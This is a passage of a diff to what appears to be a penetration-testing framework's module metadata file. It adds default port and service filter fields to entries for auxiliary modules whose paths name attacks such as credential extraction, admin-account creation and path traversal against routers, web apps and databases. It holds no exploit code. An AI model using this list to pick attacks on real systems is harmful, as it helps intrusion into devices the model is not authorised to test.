"", "rport": 8028, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb", @@ -561,6 +728,12 @@ "platform": "", "arch": "", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb", @@ -593,6 +766,12 @@ "platform": "", "arch": "", "rport": 3500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb", @@ -623,6 +802,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb", @@ -658,6 +852,12 @@ "platform": "", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb", @@ -690,6 +890,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-03-16 16:46:50 +0000", "path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb", @@ -724,6 +939,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb", @@ -758,6 +988,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb", @@ -790,6 +1035,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb", @@ -822,6 +1073,21 @@ "platform": "", "arch": "", "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/axigen_file_access.rb", @@ -853,6 +1119,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb", @@ -883,6 +1164,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:53:02 +0000", "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb", @@ -913,6 +1209,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:53:02 +0000", "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb", @@ -943,6 +1254,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb", @@ -976,6 +1302,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb", @@ -1008,6 +1349,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb", @@ -1039,6 +1395,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb", @@ -1073,6 +1444,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb", @@ -1105,6 +1491,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-03-09 07:43:12 +0000", "path": "/modules/auxiliary/admin/http/gitstack_rest.rb", @@ -1136,6 +1537,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb", @@ -1169,6 +1585,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb", @@ -1202,6 +1633,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb", @@ -1232,6 +1678,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb", @@ -1264,6 +1725,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb", @@ -1296,6 +1772,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb", @@ -1327,6 +1818,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb", @@ -1362,6 +1868,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb", @@ -1394,6 +1915,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb", @@ -1425,6 +1961,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb", @@ -1457,6 +2008,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb", @@ -1489,6 +2055,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb", @@ -1521,6 +2102,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb", @@ -1554,6 +2150,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb", @@ -1586,6 +2197,21 @@ "platform": "", "arch": "", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb", @@ -1618,6 +2244,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb", @@ -1650,6 +2291,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manageengine_file_download.rb", @@ -1682,6 +2338,21 @@ "platform": "", "arch": "", "rport": 7272, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb", @@ -1715,6 +2386,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb", @@ -1746,6 +2432,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb", @@ -1778,6 +2479,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/netflow_file_download.rb", @@ -1810,6 +2526,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/netgear_auth_download.rb", @@ -1843,6 +2574,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb", @@ -1876,6 +2622,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb", @@ -1907,6 +2668,21 @@ "platform": "", "arch": "", "rport": 3780, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb", @@ -1939,6 +2715,21 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb", @@ -1971,6 +2762,21 @@ "platform": "", "arch": "", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb", @@ -2003,6 +2809,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb", @@ -2034,6 +2855,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-30 13:03:36 +0000", "path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb", @@ -2070,6 +2906,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb", @@ -2099,6 +2950,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb", @@ -2133,6 +2999,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb", @@ -2168,6 +3049,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb", @@ -2199,6 +3095,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb", @@ -2231,6 +3142,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/sysaid_file_download.rb", @@ -2263,6 +3189,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb", @@ -2292,6 +3233,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-05-23 09:32:41 +0000", "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb", @@ -2321,6 +3277,21 @@ "platform": "", "arch": "", "rport": 8180, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/admin/http/tomcat_administration.rb", @@ -2354,6 +3325,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb", @@ -2389,6 +3375,21 @@ "platform": "", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb", @@ -2420,6 +3421,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-03-15 10:46:08 +0000", "path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb", @@ -2452,6 +3468,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb", @@ -2485,6 +3516,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb", @@ -2517,6 +3563,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb", @@ -2546,6 +3607,21 @@ "platform": "", "arch": "", "rport": 8503, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb", @@ -2577,6 +3653,21 @@ "platform": "", "arch": "", "rport": 22006, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-15 16:31:09 +0000", "path": "/modules/auxiliary/admin/http/ulterius_file_download.rb", @@ -2610,6 +3701,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-24 13:18:32 +0000", "path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb", @@ -2642,6 +3748,21 @@ "platform": "", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb", @@ -2673,6 +3794,21 @@ "platform": "", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/http/webnms_file_download.rb", @@ -2705,6 +3841,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb", @@ -2736,6 +3887,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb", @@ -2767,6 +3933,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb", @@ -2797,6 +3978,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb", @@ -2827,6 +4023,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-10-09 17:06:05 +0000", "path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb", @@ -2864,6 +4075,12 @@ "platform": "", "arch": "", "rport": 88, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb", @@ -2895,6 +4112,12 @@ "platform": "", "arch": "", "rport": 7210, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb", @@ -2926,6 +4149,12 @@ "platform": "", "arch": "", "rport": 32764, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb", @@ -2955,6 +4184,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/misc/wol.rb", @@ -2986,6 +4221,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb", @@ -3018,6 +4259,12 @@ "platform": "", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb", @@ -3047,6 +4294,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-16 21:40:03 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb", @@ -3077,6 +4338,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb", @@ -3107,6 +4382,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb", @@ -3136,6 +4426,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb", @@ -3165,6 +4469,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb", @@ -3194,6 +4512,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": 